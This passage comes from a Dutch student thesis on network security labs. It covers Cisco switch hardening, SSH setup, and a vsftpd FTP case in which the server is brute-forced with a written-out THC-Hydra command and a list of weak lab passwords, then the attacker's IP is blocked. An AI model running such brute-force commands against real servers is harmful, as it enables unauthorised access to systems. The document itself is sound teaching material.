aangeleerd kunnen worden. Als het deze 10 poorten probeert te overschrijden dan zal er een SNMP
bericht naar de netwerk administrator gestuurd worden waardoor deze automatisch op de hoogte
gebracht wordt van de situatie.
Commando’s om switchport security in te stellen:
enable
conf t
interface fa0/1
switchport port-security
switchport port-security maximum 10
switchport port-security restrict
end
copy run start
6.2 Dynamic ARP-inspection Je kan dynamic ARP-inspection instellen, dit zal de MAC-adressen mappen aan een IP-adres. Hierdoor
zullen de reply’s die je stuurt om aan ARP-poisoning te doen niet doorgelaten worden en dus hun
eindbestemming niet bereiken.
Om dynamic ARP-inspection toe te passen zal je moeten werken met VLAN’s, je zal dan per VLAN
deze inspectie instellen. De link tussen de switches zet je op trust zodat die ARP-pakketten niet
gecontroleerd worden.
Commando’s om dynamic arp-inspection in te stellen:
enable
conf t
ip arp inspection <vlan nummer>
interface gig0/1
ip arp inspection trust
end
copy run start
Bron:
http://www.cisco.com/en/US/docs/switches/lan/catalyst3550/software/release/12.2_25_see/config
uration/guide/swdynarp.html
123
6.3 SSH in plaats van Telnet Telnet is een protocol dat je beter niet meer gebruikt, er zijn andere alternatieven zoals SSH die de
pakketten zal encrypteren voordat deze op het netwerk gestuurd worden.
Om SSH in te stellen zal je eerst een hostname en een domain-name moeten instellen. Je zal dit
moeten doen omdat beide gebruikt worden bij het genereren van de keys. Deze keys worden
gebruikt bij het encrypteren van de pakketten. Als volgt moet je de keys aanmaken. Ten laatste zorg
je ervoor dat enkel SSH toegelaten wordt voor remote access.
Commando’s om SSH in te stellen:
enable
conf t
hostname HoofdRouter
ip domain-name hoofdrouter.cisco.com
crypto key generate rsa
line vty 0 4
transport input ssh
end
copy run start
7 Conclusie Als een hacker echt wil, zal hij zo goed als altijd wel een manier vinden om je netwerk af te luisteren.
Hierdoor is het aangeraden om ervoor te zorgen dat je altijd encryptie gebruikt om de pakketten op
je netwerk te encrypteren.
Telnet is een onveilig protocol dat eigenlijk niet meer zou mogen gebruikt worden. In plaats hiervan
zou je altijd SSH moeten gebruiken omdat er bij SSH encryptie gebeurt. Als er dan toch iemand in
slaagt om verkeer op je netwerk af te luisteren dan kan hij niets doen met die pakketten omdat deze
geëncrypteerd zijn.
124
125
Case 3: FTP beheren en aanvallen 1 Inleiding FTP (File Transfer Protocol)-servers worden in bedrijven vaak gebruikt om bestanden te delen, die
tevens extern kunnen geraadpleegd worden. De taak van een netwerkbeheerder is om de FTP-server
toegankelijk te maken voor werknemers, en tegelijk de veiligheid te bewaren zodat onbevoegde
personen de server niet kunnen binnendringen.
De manier waarop dit gedaan wordt is door bepaalde configuraties te maken waardor we accounts
verkrijgen, die daarna door bepaalde gebruikers kunnen gebruikt worden en deze te beveiligen met
een wachtwoord.
2 Benodigdheden Toestel IP-adres
FTP server 192.168.0.121/24
FTP client 192.168.0.221/24
2.1 FTP server Hiervoor gebruiken we een VirtualBox met Linux Mint versie 2.6/3.x.
De software die we gaan gebruiken noemt "vsftpd" en is een standaard geworden voor Linux FTP
servers.
2.2 FTP client Om de toegang te vergemakkelijken gebruiken we geen FTP client software, maar een normale
webbrowser zoals Mozilla Firefox voor Linux. We behouden de VirtualBox met Linux Mint versie
2.6/3.x
3 Objectieven 1. FTP server installeren en configureren
2. FTP server configureren voor anonieme toegang
3. Logging inschakelen
4. Server proberen kraken
5. Conclusies trekken
6. Anonieme toegang uitschakelen en accounts aanmaken
7. Server proberen kraken
8. Conclusies trekken
126
4 Stappenplan In dit stappenplan zal besproken worden hoe een FTP server kan geconfigureerd en geraadpleegd
worden. Daarnaast bekijken we ook de verschillende gradaties van veiligheid dat men kan instellen
op een FTP server en welke mogelijkheden er bestaan om een FTP server te kraken. De pogingen
worden zo goed mogelijk in de gaten gehouden door alles te loggen.
1. FTP server installeren en configureren
Eerst en vooral worden we "superuser" door het commando su in te geven zonder extra
parameters. Nadat we het wachtwoord hebben ingegeven kunnen we de vsftpd package
installeren m.b.v. het apt-get install vsftpd commando.
Vervolgens gaan we naar het configuratiebestand voor vsftpd om te kijken wat we allemaal kunnen
configureren. vim is een tekstverwerker dat toelaat bestanden te openen en aan te passen. Het
bestand dat we willen aanpassen bevind zich in de /etc/ folder bij alle andere
configuratiebestanden onder de naam vsftpd.conf.
Hieronder bespreken we wat we gaan configureren en waarvoor alles dient. De drie puntjes (...) is
waar tekst is weggelaten die onnodig is voor deze case.
# Example config file /etc/vsftpd.conf
...
# Run standalone? vsftpd can run either from an inetd or as a standalone
# daemon started from an initscript.
listen=YES
...
Hier zeggen we dat we de vsftpd daemon als intiscript starten. Wat dit wil zeggen is dat de FTP
server opgestart wordt van zodra het systeem is opgestart. We stellen dit in zodat we zeker weten
dat de FTP server zal opstarten.
127
...
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
...
Er moet opgemerkt worden dat het nodig is om routers in te stellen zodat ze aan port forwarding
doen op poort 20 en 21 (TCP), anders kan het IP-adres van de server niet geforward worden.
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
nopriv_user=ftpsecure
Om toch enigszins volgens een standaard te werken, is het best om een geïsoleerde gebruiker aan te
maken zonder rechten dat de FTP server kan gebruiken. In dit voorbeeld maken we de gebruiker
ftpsecure aan door het commando useradd te gebruiken.
Vervolgens geven we hem een wachtwoord met passwd, anders zal de gebruiker niet kunnen
gebruikt worden.
...
# You may fully customise the login banner string:
ftpd_banner=Welcome to FTP test service.
...
Voor de volledigheid veranderen we ook de banner die een gebruiker ziet eenmaal hij ingelogd is.
2. FTP server configureren voor anonieme toegang ...
# Allow anonymous FTP? (Disabled by default)
anonymous_enable=YES
...
Ook deze optie stellen we in om te kijken of we de server kunnen bereiken en welke gevaren er
schuilen bij het inschakelen van deze optie. Als we echter via een webbrowser anoniem proberen in
te loggen krijgen we nog steeds een fout. Dit is omdat webbrowsers onnodig twee maal controleren
of er een wachtwoord vereist is.
128
Normaal zou dit scherm niet mogen verschijnen als anonieme login ingeschakeld staat
Om dit te omzeilen gebruiken we een optie die niet in de standaardconfiguratie aanwezig is.
...
no_anon_password=YES
...
Dit zorgt ervoor dat er ook met webbrowsers anoniem kan worden ingelogd.
...
# Uncomment this to allow local users to log in.
local_enable=NO
...
We zetten voorlopig de mogelijkheid om in te loggen met lokale accounts uit, omdat we eerst
anoniem gaan inloggen.
...
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you
will
# obviously need to create a directory writable by the FTP user.
anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
anon_mkdir_write_enable=YES
...
Hier schakelen we in dat de anonieme gebruikers bestanden kan uploaden en directories kan maken.
129
3. Logging inschakelen
Om logging in te schakelen stellen we de vsftpd configuratiefile als volgt in:
...
# Activate logging of uploads/downloads.
xferlog_enable=YES
...
# You may override where the log file goes if you like. The default is
shown
# below.
xferlog_file=/var/log/vsftpd.log
...
Dit is nog niet genoeg, vermits de file /var/log/vsftpd.log nog niet aangemaakt is en de nodige
rechten heeft gekregen. We maken het bestand aan met touch /var/log/vsftpd.log en
vervolgens passen we de bevoegdheden aan met chmod 777. Dit laatste zorgt ervoor dat elke
gebruiker op het bestand kan schrijven en lezen.
130
Als test loggen we anoniem in op de FTP server, eenmaal lokaal en de andere keer op een host.
Met cat bekijken we de inhoud van een file.
De eerste regel van de logfile laat zien dat er een client met IP-adres 192.168.0.212 heeft kunnen
verbinden met de server. De regel daaronder geeft weer dat er met anonieme logingegevens is
gewerkt. De derde regel zegt ons dat er in de folder /opendir/ een bestand is gedownload,
namelijk TEST123.txt.
Daaronder gebeurt hetzelfde, maar dan in de default folder en het bestand 0123Test.txt.
Tevens kunnen we hier zien dat er lokaal is gewerkt, omdat 127.0.0.1 het adres van de localhost is.
Dit is m.a.w. het adres van de FTP server.
131
4. Server proberen kraken
Anonieme toegang hoeft helemaal niet gekraakt te worden. Het enige wat moet verkregen worden is
het IP-adres van de FTP server zodat er kan mee geconnecteerd worden. Door footprinting en
scanning toe te passen zou dit geen probleem mogen zijn.
Als er een goede DMZ ingesteld is en de FTP server enkel lokaal gebruikt zal worden, dan hoeft hier
geen extra beveiliging toegepast te worden.
5. Conclusies trekken
Pluspunt: Iedereen kan aan de bestanden op de server.
Minpunt: Iedereen kan aan de bestanden op de server.
6. Anonieme toegang uitschakelen, configuratie aanpassen en accounts aanmaken
Anonieme toegang uitschakelen is even terugkijken naar wat er eerder geconfigureerd is geweest en
dit ongedaan maken
...
# Allow anonymous FTP? (Disabled by default)
anonymous_enable=NO
...
# Uncomment this to allow local users to log in.
local_enable=YES
...
Nog een veiligheidstip is om de tijd aan te passen wanneer een sessie waarop ingelogd is te doen
verstrijken.
...
#You may change the default value for timing out an idle session.
idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
data_connection_timeout=120
...
Hieronder specificiëren we de RSA certificaten en sleutel dat we gebruiken voor SSL, dat connecties
zal encrypteren zodat wachtwoorden niet zo makkelijk kunnen worden afgeluisterd.
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
# This option specifies the location of the RSA key to use for SSL
# encrypted connections.
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
Nu we de veiligheid een beetje achter handen hebben maken we de verschillende accounts aan.
132
We gebruiken hiervoor deze template:
Gebruikersnaam Wachtwoord
User001 X1234a
User002 X1235b
User003 X1236c
User004 X1237d
User005 X1238e
User006 X1239f
User007 azerty
User008 azerty
User009 azerty
User010 azerty
Gebruikers aanmaken doet men met het commando useradd, waarna een wachtwoord kan ingesteld
worden met eventuele persoonlijke informatie. Hieronder een voorbeeld:
133
Even controleren of alle gebruikers aangemaakt zijn:
De volgende stap is de configuratiefile weer aanpassen om een lijst van lokale gebruikers te
gebruiken als gebruikers voor de FTP server. Dit zijn de variabelen die we moeten aanpassen:
...
chroot_list_enable=YES
allow_writeable_chroot=YES
...
Deze twee variabelen zorgen ervoor dat de FTP server een lijst van lokale gebruikers zal hanteren om
de login's te regelen. De locatie van deze lijst is /etc/vsftpd.chroot_list. Hier hoeven er enkel
de gebruikersnamen te staan van degenen die mogen inloggen. Wachtwoorden zijn hetzelfde als de
lokale varianten.
We verwijderen alle logs die we tot nu toe hebben gemaakt en we kijken wat er gebeurt als we
proberen inloggen.
De poging is succesvol.
Nu proberen we anoniem in te loggen door geen gebruikersnaam en wachtwoord in te geven.
Het anoniem inloggen lukt niet meer.
7. Server proberen kraken
Een manier om op de FTP server te geraken, ook al is anonieme login uitgeschakeld, is om te brute-
forcen. We gaan in deze case ervan uit dat de aanvaller is kunnen binnendringen in het hoofdgebouw
134
van het bedrijf en enkele foto's heeft kunnen nemen van nota's die op het bureau van de
netwerkadministrator lagen.
Na het installeren van THC-Hydra passen we de brute-forcing toe. Dit is wat we tot nu toe weten:
Het IP-adres van de FTP server is 192.168.0.121
Gebruikersnamen gaan van "user001" tot "user010"
Wachtwoorden variëren van "X1234a" tot "azerty"
Met deze informatie gaan we een stapje verder en proberen we binnen te geraken.
Met het commando ./hydra host_address ftp -L gebruikers.txt -P
wachtwoorden.txt kan het brute-forcen beginnen. De data staat in de juiste documenten en het
aangepaste commando luidt als volgt:
./hydra 192.168.0.121 ftp -L /home/adminuser/Desktop/gebruikers -P
/home/adminuser/Desktop/wachtwoorden
135
We zijn binnen.
Wat ziet de netwerkbeheerder nu aan zijn kant? We bekijken voor een laatste maal de logging.
Hier klopt iets niet
Eenmaal de netwerkbeheerder door heeft wat er aan de hand is kunnen er maatregelen getroffen
worden. Het weigeren van een connectie door een bepaald IP-adres bijvoorbeeld. Dit gaan we als
voorbeeld manueel doen, maar hier kunnen scripts voor geschreven worden.
136
Door in /etc/hosts.deny een nieuwe regel toe te voegen kunnen we de toegang van de aanvaller
stopzetten. Dit is de nieuwe regel dat zal toegevoegd worden:
vsftpd : 192.168.0.212
We kijken of dit iets heeft uitgeholpen aan de pogingen van de aanvaller:
De hacker kan niet meer inloggen.
5 Conclusie De hacker is binnengeraakt door brute-forcing toe te passen, met informatie die hij verkregen heeft
door slimme Footprinting toe te passen. De lessen die hier kunnen uit geleerd worden is om nooit
wachtwoorden op te schrijven, zelfs niet als de gebruikersnaam ontbreekt.
Het configureren van een FTP server brengt met zich mee dat er steeds aan gevaren van buitenaf
moet gedacht worden vooraleer de server online komt te staan. De schade in het voorbeeld is reeds
gedaan, de hacker weet welke gebruikersnamen werken en welke wachtwoorden er gebruikt
worden. Een simpele verandering van zijn IP-adres doet genoeg om verder te gaan met het
infiltreren.
137
Bibliografie 1 Websites http://www.watchguard.com/infocenter/editorial/135324.asp
http://www.watchguard.com/archive/files/images/ARPpoison3.jpg
http://www.cisco.com/en/US/docs/switches/lan/catalyst3550/software/release/12.2_25_see/config
uration/guide/swdynarp.html
http://www.diffen.com/difference/TCP_vs_UDP
http://www.plixer.com/blog/scrutinizer/the-null-scan-you%E2%80%99re-being-watched/
http://www.networkuptime.com/nmap/page3-13.shtml
http://www.networkuptime.com/nmap/page3-14.shtml
http://nmap.org/book/man-port-scanning-techniques.html
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites#Looking_world-writable_directories
http://en.wikipedia.org/wiki/Honeypot_%28computing%29
https://sc1.checkpoint.com/documents/R77/CP_R77_VPN_AdminGuide/13847.htm
https://supportforums.cisco.com/docs/DOC-8125,
http://en.wikipedia.org/wiki/IPsec#Security_association
http://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol,
http://cisco-vpn.org.ua/1587051044/ch08lev1sec1.html
http://nl.wikipedia.org/wiki/Diffie-Hellman-sleuteluitwisselingsprotocol
http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htmFrequenties
https://discussions.apple.com/thread/2632171,
http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htm
http://en.wikipedia.org/wiki/IEEE_802.11i-2004
http://www.watchguard.com/infocenter/editorial/135324.asp
http://www.watchguard.com/archive/files/images/ARPpoison3.jpg
http://www.cisco.com/en/US/docs/switches/lan/catalyst3550/software/release/12.2_25_see/config
uration/guide/swdynarp.html
2 Boeken Keith Barker en Scott Morris. (2013). CCNA Security 640-554 Official Cert Guide.
Stuart McClure, Joel Scrambray, George Kurtz. (2012). Hacking Exposed 7
138
Timesheets 1 Tijdstabel Hacking Exposed
Tijdstabel Hacking Exposed
Tijbesteding Plaats Dag Beginuur Einduur Gespendeerde uren Totaal uren
Uitleg gekregen over bachlorproef en wat er van ons verwacht wordt
Klas 23/sep 16.00 u. 18.00 u. 2.00 u. 2.00 u.
Uitleg gekregen over bachlorproef en wat er van ons verwacht wordt
Klas 24/sep 14.00 u. 16.00 u. 2.00 u. 4.00 u.
Lijst van mogelijke prover overlopen. Overzicht maken van proeven waar ik in geïntresseerd ben en hier 3 plaatsen uitkiezen
Klas 25/sep 14.00 u. 18.00 u. 4.00 u. 8.00 u.
De 3 uitgekozen plaatsen contacteren Klas 27/sep 14.00 u. 18.00 u. 4.00 u. 12.00 u.
Beginnen aan de PID Klas 30/sep 16.00 u. 18.00 u. 2.00 u. 14.00 u.
Presentatie en tekst opstellen Klas 2/okt 14.00 u. 18.00 u. 4.00 u. 18.00 u.
Verdere uitleg gekregen over PID en eindwerk Klas 3/okt 14.00 u. 16.00 u. 2.00 u. 20.00 u.
Presentatie geven over de gekozen bachlorproef Klas 4/okt 14.00 u. 18.00 u. 4.00 u. 24.00 u.
Dualboot geconfigureerd op laptop Thuis 5/okt 17.00 u. 23.00 u. 6.00 u. 30.00 u.
Geëxperimenteerd met Backtrack 5 r3 Thuis 6/okt 14.00 u. 18.00 u. 4.00 u. 34.00 u.
Afspraak met iMinds Klas 7/okt 16.00 u. 18.00 u. 2.00 u. 36.00 u.
Boek Hacking Exposed 7 lezen Klas 8/okt 14.00 u. 16.00 u. 2.00 u. 38.00 u.
Werken aan PID Klas 9/okt 14.00 u. 18.00 u. 4.00 u. 42.00 u.
Werken aan PID Klas 10/okt 14.00 u. 16.00 u. 2.00 u. 44.00 u.
139
Document opstellen met 10 mogelijke manier om te hacken, een korte beschrijving en een oplossing om dit tegen te gaan
Klas 11/okt 14.00 u. 18.00 u. 4.00 u. 48.00 u.
Werken aan PID Klas 16/okt 14.00 u. 18.00 u. 4.00 u. 52.00 u.
Lezen in boek Hacking Exposed 7: H1 Footprinting Klas 17/okt 14.00 u. 16.00 u. 2.00 u. 54.00 u.
Lezen in boek Hacking Exposed 7: H1 Footprinting Klas 18/okt 14.00 u. 18.00 u. 4.00 u. 58.00 u.
Lezen in boek Hacking Exposed 7: H1 Footprinting Klas 21/okt 16.00 u. 18.00 u. 2.00 u. 60.00 u.
Lezen in boek Hacking Exposed 7: H2 Scanning Klas 22/okt 14.00 u. 16.00 u. 2.00 u. 62.00 u.
Lezen in boek Hacking Exposed 7: H2 Scanning Klas 23/okt 14.00 u. 18.00 u. 4.00 u. 66.00 u.
Lezen in boek Hacking Exposed 7: H2 Scanning Klas 24/okt 14.00 u. 16.00 u. 2.00 u. 68.00 u.
Deliverable Stap 1 maken op een kladblad Klas 25/okt 14.00 u. 18.00 u. 4.00 u. 72.00 u.
Lezen in boek Hacking Exposed 7: H2 Scanning Klas 6/nov 14.00 u. 18.00 u. 4.00 u. 76.00 u.
Deliverable Footprinting Stap 1 Klas 7/nov 14.00 u. 16.00 u. 2.00 u. 78.00 u.
Deliverable Footprinting Stap 1 Thuis 8/nov 11.00 u. 12.00 u. 1.00 u. 79.00 u.
Deliverable Footprinting Stap 1 Thuis 8/nov 14.00 u. 16.00 u. 2.00 u. 81.00 u.
Deliverable Footprinting Stap 1 Thuis 8/nov 19.00 u. 20.00 u. 1.00 u. 82.00 u.
Deliverable Footprinting Stap 1 Thuis 11/nov 16.00 u. 18.00 u. 2.00 u. 84.00 u.
Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 12/nov 14.00 u. 16.00 u. 2.00 u. 86.00 u.
Superhackaton Voorbereiding School 14/nov 9.00 u. 18.00 u. 9.00 u. 95.00 u.
Superhackaton Monitoring School 15/nov 7.30 u. 21.00 u. 13.30 u. 108.30 u.
Zoeken naar tijdstabel want tijdstabel verloren Thuis 18/nov 14.00 u. 17.00 u. 3.00 u. 111.30 u.
Deliverable Footprinting Stap 1 Thuis 19/nov 17.00 u. 18.00 u. 1.00 u. 112.30 u.
Deliverable Footprinting Stap 1 School 20/nov 14.00 u. 18.00 u. 4.00 u. 116.30 u.
Lezen in boek Hacking Exposed 7: H3 Enumeration Trein 21/nov 10.00 u. 10.50 u. 0.50 u. 117.20 u.
Deliverable Footprinting Stap 1 afgewerkt Thuis 23/nov 14.00 u. 16.00 u. 2.00 u. 119.20 u.
Nalezen Deliverable Footprinting Stap 1 Thuis 24/nov 20.00 u. 21.00 u. 1.00 u. 120.20 u.
Deliverable Scanning Stap 2 Thuis 25/nov 13.00 u. 14.30 u. 1.30 u. 121.50 u.
Deliverable Scanning Stap 2 School 25/nov 16.00 u. 18.00 u. 2.00 u. 123.50 u.
Deliverable Scanning Stap 2 Thuis 25/nov 20.00 u. 22.00 u. 2.00 u. 125.50 u.
140
Deliverable Scanning Stap 2 Thuis 26/nov 20.00 u. 22.30 u. 2.30 u. 128.20 u.
Deliverable Scanning Stap 2 School 27/nov 13.50 u. 15.40 u. 1.50 u. 130.10 u.
Lezen in boek Hacking Exposed 7: H3 Enumeration School 28/nov 8.00 u. 8.40 u. 0.40 u. 130.50 u.
Deliverable Scanning Stap 2 School 28/nov 14.00 u. 16.00 u. 2.00 u. 132.50 u.
Nalezen Deliverable Footprinting Stap 1 Thuis 29/nov 9.30 u. 11.30 u. 2.00 u. 134.50 u.
Lezen in boek Hacking Exposed 7: H3 Enumeration Trein 29/nov 13.00 u. 13.30 u. 0.30 u. 135.20 u.
Deliverable Scanning Stap 2 School 29/nov 14.10 u. 14.40 u. 0.30 u. 135.50 u.
Gekozen welke cases we zullen uitwerken School 6/dec 14.40 u. 15.30 u. 0.50 u. 136.40 u.
Case 1: Scanning en IOS IPS opstellen School 18/dec 14.00 u. 17.30 u. 3.30 u. 140.10 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren
School 18/dec 17.30 u. 18.10 u. 0.40 u. 140.50 u.
Case 1: Scanning en IOS IPS opstellen School 19/dec 14.00 u. 18.10 u. 4.10 u. 145.00 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren
School 20/dec 10.00 u. 12.30 u. 2.30 u. 147.30 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren
School 20/dec 14.00 u. 17.20 u. 3.20 u. 150.50 u.
Deliverable Scanning Stap 2 Thuis 22/dec 14.00 u. 16.20 u. 2.20 u. 153.10 u.
Deliverable Scanning Stap 2 Thuis 22/dec 17.00 u. 18.10 u. 1.10 u. 154.20 u.
Deliverable Scanning Stap 2 Thuis 23/dec 11.00 u. 12.30 u. 1.30 u. 155.50 u.
Deliverable Scanning Stap 2 Thuis 23/dec 14.00 u. 18.00 u. 4.00 u. 159.50 u.
Deliverable Scanning Stap 2 Thuis 23/dec 19.10 u. 22.20 u. 3.10 u. 163.00 u.
Deliverable Scanning Stap 2 Thuis 24/dec 10.10 u. 12.30 u. 2.20 u. 165.20 u.
Deliverable Scanning Stap 2 Thuis 24/dec 13.40 u. 15.30 u. 1.50 u. 167.10 u.
Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 26/dec 10.00 u. 12.00 u. 2.00 u. 169.10 u.
Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 27/dec 14.00 u. 15.20 u. 1.20 u. 170.30 u.
Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 27/dec 16.00 u. 17.10 u. 1.10 u. 171.40 u.
Lezen in boek Hacking Exposed 7: H5 Hacking Unix Thuis 28/dec 10.20 u. 11.40 u. 1.20 u. 173.00 u.
Lezen in boek Hacking Exposed 7: H5 Hacking Unix Thuis 28/dec 14.50 u. 16.30 u. 1.40 u. 174.40 u.
141
Lezen in boek Hacking Exposed 7: H7 Remote Connectivity and VoIP Hacking
Thuis 29/dec 11.10 u. 12.30 u. 1.20 u. 176.00 u.
Lezen in boek Hacking Exposed 7: H7 Remote Connectivity and VoIP Hacking
Thuis 29/dec 14.40 u. 16.30 u. 1.50 u. 177.50 u.
Lezen in boek Hacking Exposed 7: H8 Wireless Hacking
Thuis 30/dec 10.30 u. 12.20 u. 1.50 u. 179.40 u.
Lezen in boek Hacking Exposed 7: H8 Wireless Hacking
Thuis 30/dec 16.00 u. 17.50 u. 1.50 u. 181.30 u.
Deliverable Enumeration Stap 3 Thuis 2/jan 14.00 u. 16.00 u. 2.00 u. 183.30 u.
Deliverable Enumeration Stap 3 Thuis 2/jan 17.00 u. 19.40 u. 2.40 u. 186.10 u.
Deliverable Enumeration Stap 3 Thuis 2/jan 20.00 u. 21.40 u. 1.40 u. 187.50 u.
Deliverable Enumeration Stap 3 Thuis 3/jan 9.20 u. 11.40 u. 2.20 u. 190.10 u.
Deliverable Enumeration Stap 3 Thuis 3/jan 11.50 u. 12.30 u. 0.40 u. 190.50 u.
Deliverable Enumeration Stap 3 Thuis 3/jan 14.00 u. 15.30 u. 1.30 u. 192.20 u.
Deliverable Hacking Unix Stap 4 Thuis 3/jan 15.10 u. 16.30 u. 1.20 u. 193.40 u.
Deliverable Hacking Unix Stap 4 Thuis 4/jan 9.30 u. 11.20 u. 1.50 u. 195.30 u.
Deliverable Hacking Unix Stap 4 Thuis 4/jan 13.00 u. 14.20 u. 1.20 u. 196.50 u.
Deliverable Hacking Unix Stap 4 Thuis 4/jan 14.40 u. 15.30 u. 0.50 u. 197.40 u.
Deliverable Hacking Unix Stap 4 Thuis 4/jan 16.00 u. 17.20 u. 1.20 u. 199.00 u.
Deliverable Hacking Unix Stap 4 Thuis 4/jan 18.00 u. 19.40 u. 1.40 u. 200.40 u.
Deliverable Remote Connectivity Stap 5 Thuis 5/jan 9.50 u. 10.40 u. 0.50 u. 201.30 u.
Deliverable Remote Connectivity Stap 5 Thuis 5/jan 11.00 u. 12.40 u. 1.40 u. 203.10 u.
Deliverable Remote Connectivity Stap 5 Thuis 5/jan 14.10 u. 16.20 u. 2.10 u. 205.20 u.
Deliverable Remote Connectivity Stap 5 Thuis 6/jan 11.30 u. 12.40 u. 1.10 u. 206.30 u.
Deliverable Remote Connectivity Stap 5 Thuis 6/jan 15.00 u. 16.50 u. 1.50 u. 208.20 u.
Deliverable Remote Connectivity Stap 5 Thuis 6/jan 17.20 u. 18.30 u. 1.10 u. 209.30 u.
Deliverable Remote Connectivity Stap 5 Thuis 7/jan 9.30 u. 11.40 u. 2.10 u. 211.40 u.
Deliverable Wireless Hacking Stap 6 Thuis 7/jan 13.00 u. 14.10 u. 1.10 u. 212.50 u.
Deliverable Wireless Hacking Stap 6 Thuis 7/jan 15.00 u. 16.20 u. 1.20 u. 214.10 u.
142
Deliverable Wireless Hacking Stap 6 Thuis 7/jan 16.30 u. 17.50 u. 1.20 u. 215.30 u.
Deliverable Wireless Hacking Stap 6 Thuis 7/jan 19.00 u. 21.40 u. 2.40 u. 218.10 u.
Deliverable Wireless Hacking Stap 6 Thuis 8/jan 14.20 u. 16.40 u. 2.20 u. 220.30 u.
Deliverable Wireless Hacking Stap 6 Thuis 8/jan 17.00 u. 18.30 u. 1.30 u. 222.00 u.
Deliverable Wireless Hacking Stap 6 Thuis 8/jan 19.20 u. 21.40 u. 2.20 u. 224.20 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 9.30 u. 11.40 u. 2.10 u. 226.30 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 13.20 u. 14.30 u. 1.10 u. 227.40 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 15.00 u. 16.40 u. 1.40 u. 229.20 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 17.10 u. 18.00 u. 0.50 u. 230.10 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 19.10 u. 21.30 u. 2.20 u. 232.30 u.
Werken aan hoofdtekst Thuis 10/jan 9.10 u. 10.40 u. 1.30 u. 234.00 u.
Werken aan hoofdtekst Thuis 10/jan 11.00 u. 12.50 u. 1.50 u. 235.50 u.
Nalezen Deliverable Scanning Stap 2 Thuis 10/jan 14.00 u. 15.40 u. 1.40 u. 237.30 u.
Nalezen Deliverable Scanning Stap 2 Thuis 10/jan 16.00 u. 17.20 u. 1.20 u. 238.50 u.
Nalezen Deliverable Scanning Stap 2 Thuis 10/jan 18.00 u. 19.50 u. 1.50 u. 240.40 u.
Nalezen Deliverable Enumeration Stap 3 Thuis 11/jan 10.20 u. 11.50 u. 1.30 u. 242.10 u.
Nalezen Deliverable Enumeration Stap 3 Thuis 11/jan 13.00 u. 14.50 u. 1.50 u. 244.00 u.
Nalezen Deliverable Enumeration Stap3 Thuis 11/jan 15.00 u. 16.20 u. 1.20 u. 245.20 u.
Nalezen Deliverable Hacking Unix Stap 4 Thuis 11/jan 16.40 u. 17.50 u. 1.10 u. 246.30 u.
Nalezen Deliverable Hacking Unix Stap 4 Thuis 11/jan 18.30 u. 20.20 u. 1.50 u. 248.20 u.
Nalezen Deliverable Hacking Unix Stap 4 Thuis 11/jan 20.40 u. 21.50 u. 1.10 u. 249.30 u.
Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 9.10 u. 10.40 u. 1.30 u. 251.00 u.
Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 11.00 u. 13.10 u. 2.10 u. 253.10 u.
Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 15.00 u. 17.20 u. 2.20 u. 255.30 u.
143
Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 17.30 u. 17.50 u. 0.20 u. 255.50 u.
Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 18.30 u. 20.10 u. 1.40 u. 257.30 u.
Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 9.30 u. 10.40 u. 1.10 u. 258.40 u.
Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 11.00 u. 12.40 u. 1.40 u. 260.20 u.
Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 14.10 u. 16.40 u. 2.30 u. 262.50 u.
Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 17.00 u. 18.10 u. 1.10 u. 264.00 u.
Werken aan Hoofdtekst Thuis 14/jan 9.40 u. 12.10 u. 2.30 u. 266.30 u.
Werken aan Hoofdtekst Thuis 14/jan 14.10 u. 16.20 u. 2.10 u. 268.40 u.
Nalezen van Hoofdteskt Thuis 14/jan 17.00 u. 18.30 u. 1.30 u. 270.10 u.
Nalezen van Hoofdteskt Thuis 14/jan 19.00 u. 20.40 u. 1.40 u. 271.50 u.
Case 1: Scanning en IOS IPS documenteren Thuis 16/jan 10.20 u. 12.40 u. 2.20 u. 274.10 u.
Case 1: Scanning en IOS IPS documenteren Thuis 16/jan 13.30 u. 15.40 u. 2.10 u. 276.20 u.
Case 1: Scanning en IOS IPS documenteren Thuis 16/jan 16.00 u. 17.30 u. 1.30 u. 277.50 u.
Case 1: Scanning en IOS IPS documenteren Thuis 17/jan 10.20 u. 13.00 u. 2.40 u. 280.30 u.
Case 1: Scanning en IOS IPS documenteren Thuis 17/jan 14.10 u. 16.30 u. 2.20 u. 282.50 u.
Aan de presentatie werken Thuis 20/jan 14.10 u. 18.10 u. 4.00 u. 286.50 u.
Alles in een document plaatsen Thuis 20/jan 19.00 u. 22.10 u. 3.10 u. 290.00 u.
